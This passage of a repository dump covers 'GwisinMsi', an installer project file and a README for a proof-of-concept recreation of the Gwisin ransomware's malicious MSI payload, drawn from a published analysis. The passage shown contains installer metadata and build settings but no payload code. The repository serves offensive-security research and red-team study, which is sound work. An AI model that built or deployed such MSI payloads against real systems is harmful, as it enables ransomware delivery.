97 | "Folder" = "8:_28CF9ABB76E0491B9A9A60632953A7FD"
98 | "Condition" = "8:"
99 | "Transitive" = "11:FALSE"
100 | "Vital" = "11:TRUE"
101 | "ReadOnly" = "11:FALSE"
102 | "Hidden" = "11:FALSE"
103 | "System" = "11:FALSE"
104 | "Permanent" = "11:FALSE"
105 | "SharedLegacy" = "11:FALSE"
106 | "PackageAs" = "3:1"
107 | "Register" = "3:1"
108 | "Exclude" = "11:FALSE"
109 | "IsDependency" = "11:FALSE"
110 | "IsolateTo" = "8:"
111 | }
112 | }
113 | "FileType"
114 | {
115 | }
116 | "Folder"
117 | {
118 | "{1525181F-901A-416C-8A58-119130FE478E}:_28CF9ABB76E0491B9A9A60632953A7FD"
119 | {
120 | "Name" = "8:#1915"
121 | "AlwaysCreate" = "11:FALSE"
122 | "Condition" = "8:"
123 | "Transitive" = "11:FALSE"
124 | "Property" = "8:AppDataFolder"
125 | "Folders"
126 | {
127 | }
128 | }
129 | "{1525181F-901A-416C-8A58-119130FE478E}:_4FF6F8BCDB0A4CB69C4788DD3E963724"
130 | {
131 | "Name" = "8:#1916"
132 | "AlwaysCreate" = "11:FALSE"
133 | "Condition" = "8:"
134 | "Transitive" = "11:FALSE"
135 | "Property" = "8:DesktopFolder"
136 | "Folders"
137 | {
138 | }
139 | }
140 | "{3C67513D-01DD-4637-8A68-80971EB9504F}:_B9648CCC22184A06A0C38C82B47CF217"
141 | {
142 | "DefaultLocation" = "8:[ProgramFiles64Folder][Manufacturer]\\[ProductName]"
143 | "Name" = "8:#1925"
144 | "AlwaysCreate" = "11:FALSE"
145 | "Condition" = "8:"
146 | "Transitive" = "11:FALSE"
147 | "Property" = "8:TARGETDIR"
148 | "Folders"
149 | {
150 | }
151 | }
152 | "{1525181F-901A-416C-8A58-119130FE478E}:_DF098EDCEDB341B397B7BDFC59764278"
153 | {
154 | "Name" = "8:#1919"
155 | "AlwaysCreate" = "11:FALSE"
156 | "Condition" = "8:"
157 | "Transitive" = "11:FALSE"
158 | "Property" = "8:ProgramMenuFolder"
159 | "Folders"
160 | {
161 | }
162 | }
163 | }
164 | "LaunchCondition"
165 | {
166 | }
167 | "Locator"
168 | {
169 | }
170 | "MsiBootstrapper"
171 | {
172 | "LangId" = "3:1033"
173 | "RequiresElevation" = "11:FALSE"
174 | }
175 | "Product"
176 | {
177 | "Name" = "8:Microsoft Visual Studio"
178 | "ProductName" = "8:GwisinMsi"
179 | "ProductCode" = "8:{7560697C-E18E-4E30-8EEC-1C2E5953C4E3}"
180 | "PackageCode" = "8:{9B40BDB7-E209-407F-BB08-BC30EEF0B673}"
181 | "UpgradeCode" = "8:{18E0FDEB-5E51-4B04-A94E-DB2D21AF27C6}"
182 | "AspNetVersion" = "8:2.0.50727.0"
183 | "RestartWWWService" = "11:FALSE"
184 | "RemovePreviousVersions" = "11:FALSE"
185 | "DetectNewerInstalledVersion" = "11:TRUE"
186 | "InstallAllUsers" = "11:FALSE"
187 | "ProductVersion" = "8:1.0.0"
188 | "Manufacturer" = "8:choi"
189 | "ARPHELPTELEPHONE" = "8:"
190 | "ARPHELPLINK" = "8:"
191 | "Title" = "8:GwisinMsi"
192 | "Subject" = "8:"
193 | "ARPCONTACT" = "8:Gwisin PoC"
194 | "Keywords" = "8:"
195 | "ARPCOMMENTS" = "8:"
196 | "ARPURLINFOABOUT" = "8:"
197 | "ARPPRODUCTICON" = "8:"
198 | "ARPIconIndex" = "3:0"
199 | "SearchPath" = "8:"
200 | "UseSystemSearchPath" = "11:TRUE"
201 | "TargetPlatform" = "3:1"
202 | "PreBuildEvent" = "8:"
203 | "PostBuildEvent" = "8:"
204 | "RunPostBuildEvent" = "3:0"
205 | }
206 | "Registry"
207 | {
208 | "HKLM"
209 | {
210 | "Keys"
211 | {
212 | "{60EA8692-D2D5-43EB-80DC-7906BF13D6EF}:_CD50586F52FD4FBEA6276102D02ADCD4"
213 | {
214 | "Name" = "8:Software"
215 | "Condition" = "8:"
216 | "AlwaysCreate" = "11:FALSE"
217 | "DeleteAtUninstall" = "11:FALSE"
218 | "Transitive" = "11:FALSE"
219 | "Keys"
220 | {
221 | "{60EA8692-D2D5-43EB-80DC-7906BF13D6EF}:_4395FD3AFDD5407BB92182378F768CC1"
222 | {
223 | "Name" = "8:[Manufacturer]"
224 | "Condition" = "8:"
225 | "AlwaysCreate" = "11:FALSE"
226 | "DeleteAtUninstall" = "11:FALSE"
227 | "Transitive" = "11:FALSE"
228 | "Keys"
229 | {
230 | }
231 | "Values"
232 | {
233 | }
234 | }
235 | }
236 | "Values"
237 | {
238 | }
239 | }
240 | }
241 | }
242 | "HKCU"
243 | {
244 | "Keys"
245 | {
246 | "{60EA8692-D2D5-43EB-80DC-7906BF13D6EF}:_B7B11BD73CEE4D9CB5C54F4216C55FAD"
247 | {
248 | "Name" = "8:Software"
249 | "Condition" = "8:"
250 | "AlwaysCreate" = "11:FALSE"
251 | "DeleteAtUninstall" = "11:FALSE"
252 | "Transitive" = "11:FALSE"
253 | "Keys"
254 | {
255 | "{60EA8692-D2D5-43EB-80DC-7906BF13D6EF}:_F84978AADE5D421C83B6907AC3F788F9"
256 | {
257 | "Name" = "8:[Manufacturer]"
258 | "Condition" = "8:"
259 | "AlwaysCreate" = "11:FALSE"
260 | "DeleteAtUninstall" = "11:FALSE"
261 | "Transitive" = "11:FALSE"
262 | "Keys"
263 | {
264 | }
265 | "Values"
266 | {
267 | }
268 | }
269 | }
270 | "Values"
271 | {
272 | }
273 | }
274 | }
275 | }
276 | "HKCR"
277 | {
278 | "Keys"
279 | {
280 | }
281 | }
282 | "HKU"
283 | {
284 | "Keys"
285 | {
286 | }
287 | }
288 | "HKPU"
289 | {
290 | "Keys"
291 | {
292 | }
293 | }
294 | }
295 | "Sequences"
296 | {
297 | }
298 | "Shortcut"
299 | {
300 | }
301 | "UserInterface"
302 | {
303 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_079E9C42ADE44922A761CD1294A3485F"
304 | {
305 | "Name" = "8:#1900"
306 | "Sequence" = "3:2"
307 | "Attributes" = "3:1"
308 | "Dialogs"
309 | {
310 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_25CDBE08A4C34BC8BC4B052C5904C05D"
311 | {
312 | "Sequence" = "3:100"
313 | "DisplayName" = "8:Welcome"
314 | "UseDynamicProperties" = "11:TRUE"
315 | "IsDependency" = "11:FALSE"
316 | "SourcePath" = "8:\\VsdAdminWelcomeDlg.wid"
317 | "Properties"
318 | {
319 | "BannerBitmap"
320 | {
321 | "Name" = "8:BannerBitmap"
322 | "DisplayName" = "8:#1001"
323 | "Description" = "8:#1101"
324 | "Type" = "3:8"
325 | "ContextData" = "8:Bitmap"
326 | "Attributes" = "3:4"
327 | "Setting" = "3:1"
328 | "UsePlugInResources" = "11:TRUE"
329 | }
330 | "CopyrightWarning"
331 | {
332 | "Name" = "8:CopyrightWarning"
333 | "DisplayName" = "8:#1002"
334 | "Description" = "8:#1102"
335 | "Type" = "3:3"
336 | "ContextData" = "8:"
337 | "Attributes" = "3:0"
338 | "Setting" = "3:1"
339 | "Value" = "8:#1202"
340 | "DefaultValue" = "8:#1202"
341 | "UsePlugInResources" = "11:TRUE"
342 | }
343 | "Welcome"
344 | {
345 | "Name" = "8:Welcome"
346 | "DisplayName" = "8:#1003"
347 | "Description" = "8:#1103"
348 | "Type" = "3:3"
349 | "ContextData" = "8:"
350 | "Attributes" = "3:0"
351 | "Setting" = "3:1"
352 | "Value" = "8:#1203"
353 | "DefaultValue" = "8:#1203"
354 | "UsePlugInResources" = "11:TRUE"
355 | }
356 | }
357 | }
358 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_493F98A2C9A3487F8D6F960C75038BFA"
359 | {
360 | "Sequence" = "3:200"
361 | "DisplayName" = "8:Installation Folder"
362 | "UseDynamicProperties" = "11:TRUE"
363 | "IsDependency" = "11:FALSE"
364 | "SourcePath" = "8:\\VsdAdminFolderDlg.wid"
365 | "Properties"
366 | {
367 | "BannerBitmap"
368 | {
369 | "Name" = "8:BannerBitmap"
370 | "DisplayName" = "8:#1001"
371 | "Description" = "8:#1101"
372 | "Type" = "3:8"
373 | "ContextData" = "8:Bitmap"
374 | "Attributes" = "3:4"
375 | "Setting" = "3:1"
376 | "UsePlugInResources" = "11:TRUE"
377 | }
378 | }
379 | }
380 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_568F2054D8724773BCE07CFC5A59E200"
381 | {
382 | "Sequence" = "3:300"
383 | "DisplayName" = "8:Confirm Installation"
384 | "UseDynamicProperties" = "11:TRUE"
385 | "IsDependency" = "11:FALSE"
386 | "SourcePath" = "8:\\VsdAdminConfirmDlg.wid"
387 | "Properties"
388 | {
389 | "BannerBitmap"
390 | {
391 | "Name" = "8:BannerBitmap"
392 | "DisplayName" = "8:#1001"
393 | "Description" = "8:#1101"
394 | "Type" = "3:8"
395 | "ContextData" = "8:Bitmap"
396 | "Attributes" = "3:4"
397 | "Setting" = "3:1"
398 | "UsePlugInResources" = "11:TRUE"
399 | }
400 | }
401 | }
402 | }
403 | }
404 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_141B27E2CB674B56B3CEA33D17005EEA"
405 | {
406 | "Name" = "8:#1902"
407 | "Sequence" = "3:1"
408 | "Attributes" = "3:3"
409 | "Dialogs"
410 | {
411 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_57E786504B5F42B7B6DBCADD39A2387F"
412 | {
413 | "Sequence" = "3:100"
414 | "DisplayName" = "8:Finished"
415 | "UseDynamicProperties" = "11:TRUE"
416 | "IsDependency" = "11:FALSE"
417 | "SourcePath" = "8:\\VsdFinishedDlg.wid"
418 | "Properties"
419 | {
420 | "BannerBitmap"
421 | {
422 | "Name" = "8:BannerBitmap"
423 | "DisplayName" = "8:#1001"
424 | "Description" = "8:#1101"
425 | "Type" = "3:8"
426 | "ContextData" = "8:Bitmap"
427 | "Attributes" = "3:4"
428 | "Setting" = "3:1"
429 | "UsePlugInResources" = "11:TRUE"
430 | }
431 | "UpdateText"
432 | {
433 | "Name" = "8:UpdateText"
434 | "DisplayName" = "8:#1058"
435 | "Description" = "8:#1158"
436 | "Type" = "3:15"
437 | "ContextData" = "8:"
438 | "Attributes" = "3:0"
439 | "Setting" = "3:1"
440 | "Value" = "8:#1258"
441 | "DefaultValue" = "8:#1258"
442 | "UsePlugInResources" = "11:TRUE"
443 | }
444 | }
445 | }
446 | }
447 | }
448 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_3A5D608A01824922835E908BC2AD0B4F"
449 | {
450 | "Name" = "8:#1900"
451 | "Sequence" = "3:1"
452 | "Attributes" = "3:1"
453 | "Dialogs"
454 | {
455 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_5903EBB087564A5E9A00F885A223EF3A"
456 | {
457 | "Sequence" = "3:300"
458 | "DisplayName" = "8:Confirm Installation"
459 | "UseDynamicProperties" = "11:TRUE"
460 | "IsDependency" = "11:FALSE"
461 | "SourcePath" = "8:\\VsdConfirmDlg.wid"
462 | "Properties"
463 | {
464 | "BannerBitmap"
465 | {
466 | "Name" = "8:BannerBitmap"
467 | "DisplayName" = "8:#1001"
468 | "Description" = "8:#1101"
469 | "Type" = "3:8"
470 | "ContextData" = "8:Bitmap"
471 | "Attributes" = "3:4"
472 | "Setting" = "3:1"
473 | "UsePlugInResources" = "11:TRUE"
474 | }
475 | }
476 | }
477 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_AB0FBC2DEEAE4D3DBDC89390FF14E943"
478 | {
479 | "Sequence" = "3:200"
480 | "DisplayName" = "8:Installation Folder"
481 | "UseDynamicProperties" = "11:TRUE"
482 | "IsDependency" = "11:FALSE"
483 | "SourcePath" = "8:\\VsdFolderDlg.wid"
484 | "Properties"
485 | {
486 | "BannerBitmap"
487 | {
488 | "Name" = "8:BannerBitmap"
489 | "DisplayName" = "8:#1001"
490 | "Description" = "8:#1101"
491 | "Type" = "3:8"
492 | "ContextData" = "8:Bitmap"
493 | "Attributes" = "3:4"
494 | "Setting" = "3:1"
495 | "UsePlugInResources" = "11:TRUE"
496 | }
497 | "InstallAllUsersVisible"
498 | {
499 | "Name" = "8:InstallAllUsersVisible"
500 | "DisplayName" = "8:#1059"
501 | "Description" = "8:#1159"
502 | "Type" = "3:5"
503 | "ContextData" = "8:1;True=1;False=0"
504 | "Attributes" = "3:0"
505 | "Setting" = "3:0"
506 | "Value" = "3:1"
507 | "DefaultValue" = "3:1"
508 | "UsePlugInResources" = "11:TRUE"
509 | }
510 | }
511 | }
512 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_D6C28C8A73AE4B499011B6E00E547B7C"
513 | {
514 | "Sequence" = "3:100"
515 | "DisplayName" = "8:Welcome"
516 | "UseDynamicProperties" = "11:TRUE"
517 | "IsDependency" = "11:FALSE"
518 | "SourcePath" = "8:\\VsdWelcomeDlg.wid"
519 | "Properties"
520 | {
521 | "BannerBitmap"
522 | {
523 | "Name" = "8:BannerBitmap"
524 | "DisplayName" = "8:#1001"
525 | "Description" = "8:#1101"
526 | "Type" = "3:8"
527 | "ContextData" = "8:Bitmap"
528 | "Attributes" = "3:4"
529 | "Setting" = "3:1"
530 | "UsePlugInResources" = "11:TRUE"
531 | }
532 | "CopyrightWarning"
533 | {
534 | "Name" = "8:CopyrightWarning"
535 | "DisplayName" = "8:#1002"
536 | "Description" = "8:#1102"
537 | "Type" = "3:3"
538 | "ContextData" = "8:"
539 | "Attributes" = "3:0"
540 | "Setting" = "3:1"
541 | "Value" = "8:#1202"
542 | "DefaultValue" = "8:#1202"
543 | "UsePlugInResources" = "11:TRUE"
544 | }
545 | "Welcome"
546 | {
547 | "Name" = "8:Welcome"
548 | "DisplayName" = "8:#1003"
549 | "Description" = "8:#1103"
550 | "Type" = "3:3"
551 | "ContextData" = "8:"
552 | "Attributes" = "3:0"
553 | "Setting" = "3:1"
554 | "Value" = "8:#1203"
555 | "DefaultValue" = "8:#1203"
556 | "UsePlugInResources" = "11:TRUE"
557 | }
558 | }
559 | }
560 | }
561 | }
562 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_61C76CE19D5C4C2D954A12B07ABFD505"
563 | {
564 | "Name" = "8:#1902"
565 | "Sequence" = "3:2"
566 | "Attributes" = "3:3"
567 | "Dialogs"
568 | {
569 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_24218A45345C471BA72EA6B3F939A486"
570 | {
571 | "Sequence" = "3:100"
572 | "DisplayName" = "8:Finished"
573 | "UseDynamicProperties" = "11:TRUE"
574 | "IsDependency" = "11:FALSE"
575 | "SourcePath" = "8:\\VsdAdminFinishedDlg.wid"
576 | "Properties"
577 | {
578 | "BannerBitmap"
579 | {
580 | "Name" = "8:BannerBitmap"
581 | "DisplayName" = "8:#1001"
582 | "Description" = "8:#1101"
583 | "Type" = "3:8"
584 | "ContextData" = "8:Bitmap"
585 | "Attributes" = "3:4"
586 | "Setting" = "3:1"
587 | "UsePlugInResources" = "11:TRUE"
588 | }
589 | }
590 | }
591 | }
592 | }
593 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_635DFFC9F2F3479090AC50FDB956E5ED"
594 | {
595 | "Name" = "8:#1901"
596 | "Sequence" = "3:1"
597 | "Attributes" = "3:2"
598 | "Dialogs"
599 | {
600 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_703D4AC7013149F9867208D2A7E7F382"
601 | {
602 | "Sequence" = "3:100"
603 | "DisplayName" = "8:Progress"
604 | "UseDynamicProperties" = "11:TRUE"
605 | "IsDependency" = "11:FALSE"
606 | "SourcePath" = "8:\\VsdProgressDlg.wid"
607 | "Properties"
608 | {
609 | "BannerBitmap"
610 | {
611 | "Name" = "8:BannerBitmap"
612 | "DisplayName" = "8:#1001"
613 | "Description" = "8:#1101"
614 | "Type" = "3:8"
615 | "ContextData" = "8:Bitmap"
616 | "Attributes" = "3:4"
617 | "Setting" = "3:1"
618 | "UsePlugInResources" = "11:TRUE"
619 | }
620 | "ShowProgress"
621 | {
622 | "Name" = "8:ShowProgress"
623 | "DisplayName" = "8:#1009"
624 | "Description" = "8:#1109"
625 | "Type" = "3:5"
626 | "ContextData" = "8:1;True=1;False=0"
627 | "Attributes" = "3:0"
628 | "Setting" = "3:0"
629 | "Value" = "3:1"
630 | "DefaultValue" = "3:1"
631 | "UsePlugInResources" = "11:TRUE"
632 | }
633 | }
634 | }
635 | }
636 | }
637 | "{DF760B10-853B-4699-99F2-AFF7185B4A62}:_68B915AADB11462BB0883290732A473B"
638 | {
639 | "Name" = "8:#1901"
640 | "Sequence" = "3:2"
641 | "Attributes" = "3:2"
642 | "Dialogs"
643 | {
644 | "{688940B3-5CA9-4162-8DEE-2993FA9D8CBC}:_F2E2FA2CA3994E0EBB515B9E9E3E6319"
645 | {
646 | "Sequence" = "3:100"
647 | "DisplayName" = "8:Progress"
648 | "UseDynamicProperties" = "11:TRUE"
649 | "IsDependency" = "11:FALSE"
650 | "SourcePath" = "8:\\VsdAdminProgressDlg.wid"
651 | "Properties"
652 | {
653 | "BannerBitmap"
654 | {
655 | "Name" = "8:BannerBitmap"
656 | "DisplayName" = "8:#1001"
657 | "Description" = "8:#1101"
658 | "Type" = "3:8"
659 | "ContextData" = "8:Bitmap"
660 | "Attributes" = "3:4"
661 | "Setting" = "3:1"
662 | "UsePlugInResources" = "11:TRUE"
663 | }
664 | "ShowProgress"
665 | {
666 | "Name" = "8:ShowProgress"
667 | "DisplayName" = "8:#1009"
668 | "Description" = "8:#1109"
669 | "Type" = "3:5"
670 | "ContextData" = "8:1;True=1;False=0"
671 | "Attributes" = "3:0"
672 | "Setting" = "3:0"
673 | "Value" = "3:1"
674 | "DefaultValue" = "3:1"
675 | "UsePlugInResources" = "11:TRUE"
676 | }
677 | }
678 | }
679 | }
680 | }
681 | "{2479F3F5-0309-486D-8047-8187E2CE5BA0}:_7AA90E7A57F14D8988F8804A8796066C"
682 | {
683 | "UseDynamicProperties" = "11:FALSE"
684 | "IsDependency" = "11:FALSE"
685 | "SourcePath" = "8:\\VsdUserInterface.wim"
686 | }
687 | "{2479F3F5-0309-486D-8047-8187E2CE5BA0}:_88F0DFB6D0BA42DFB4FF876B414CFE95"
688 | {
689 | "UseDynamicProperties" = "11:FALSE"
690 | "IsDependency" = "11:FALSE"
691 | "SourcePath" = "8:\\VsdBasicDialogs.wim"
692 | }
693 | }
694 | "MergeModule"
695 | {
696 | }
697 | "ProjectOutput"
698 | {
699 | }
700 | }
701 | }
702 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # GwisinMsi
2 |
3 | This repo contains the PoC of the MSI payload used in the [blog post](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/). The payload is based on the Gwisin ransomware's MSI payload analysis of the AhnLab ASEC team's [blog post](https://asec.ahnlab.com/en/37483/).
4 |
5 | ## DLL Compiling Configuration
6 | - Project > Project properties > c/c++ > preprocessor > processor definition - `_CRT_SECURE_NO_WARNINGS`
7 | - Project > Project properties > Charset > Multi-byte
8 |
9 | ## Credits and References
10 | - [HuskyHacks](https://huskyhacks.dev/) - MSI Payload [Blog Post](https://notes.huskyhacks.dev/notes/ms-interloper-on-the-subject-of-malicious-msis)
11 | - [ASEC AhnLab](https://asec.ahnlab.com/en/) - [blog post](https://asec.ahnlab.com/en/37483/)
12 | - [SK Shieldus](https://www.skshieldus.com/download/files/download.do?o_fname=%EA%B7%80%EC%8B%A0(Gwisin)%20%EB%9E%9C%EC%84%AC%EC%9B%A8%EC%96%B4%20%EA%B3%B5%EA%B2%A9%20%EC%A0%84%EB%9E%B5%20%EB%B6%84%EC%84%9D%20%EB%A6%AC%ED%8F%AC%ED%8A%B8.pdf&r_fname=20220824150111854.pdf)
13 | - [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md)
14 |
15 | ## Demo
16 | 
17 |
--------------------------------------------------------------------------------
/image/msi-demo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ChoiSG/GwisinMsi/503e1c9da38d1fa070e9dd0d1df2c0e101e67867/image/msi-demo.gif
--------------------------------------------------------------------------------